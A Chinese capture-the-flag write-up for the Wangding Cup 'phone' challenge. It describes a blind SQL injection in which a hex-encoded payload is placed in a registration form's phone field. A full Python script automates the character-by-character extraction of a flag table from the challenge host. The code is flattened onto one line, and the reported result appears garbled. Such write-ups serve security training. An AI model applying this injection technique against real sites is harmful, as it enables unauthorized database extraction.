网鼎杯题目“phone”--十六进制mysql注入
注册后,即可点击查看谁的电话和我类似。
注册时有三个必填项,分别是用户名、密码和电话。电话要求必须数字。
注册个1111的电话后,点击查看,返回有1个人电话和我类似,在注册一个为1111的,返回有2人电话和我类似。 说明连数据库查询了,而且只返回数字。
盲注的思路,注册时电话填写十六进制。
于是python如下:
#coding=utf-8 import requests import binascii import re def login_sqli(url,username,password,payload): url = url username = username password = password headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0' } # login data = {'username':username, 'password':password, 'phone':payload, 'register':'Login' } try: #get_session s = requests.session() req1 = s.get(url+'/index.php') #register req2 = s.post(url+'/register.php',data = data) #sqli req3 = s.get(url+'/query.php') return req3.text except: print 'Error' if __name__ == '__main__': login_url = 'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com' password = '123123' result = '' pattern = re.compile(r'\d?\d?\d?\d?\d?\d') for i in range(1,43): for j in range(33,128): payload = "5555%%' and ord(mid((select * from flag),%d,1))=%d #" %(i,j) payload_0x = binascii.b2a_hex(payload) _payload = '0x'+payload_0x username = 'userrif'+str(i)+str(j) text = login_sqli(login_url,username,password,_payload) #time.sleep(3) r = re.search(pattern,text) if(int(r.group()) > 0): print str(i)+'-->'+chr(j) else: continue
结果:
x000s'''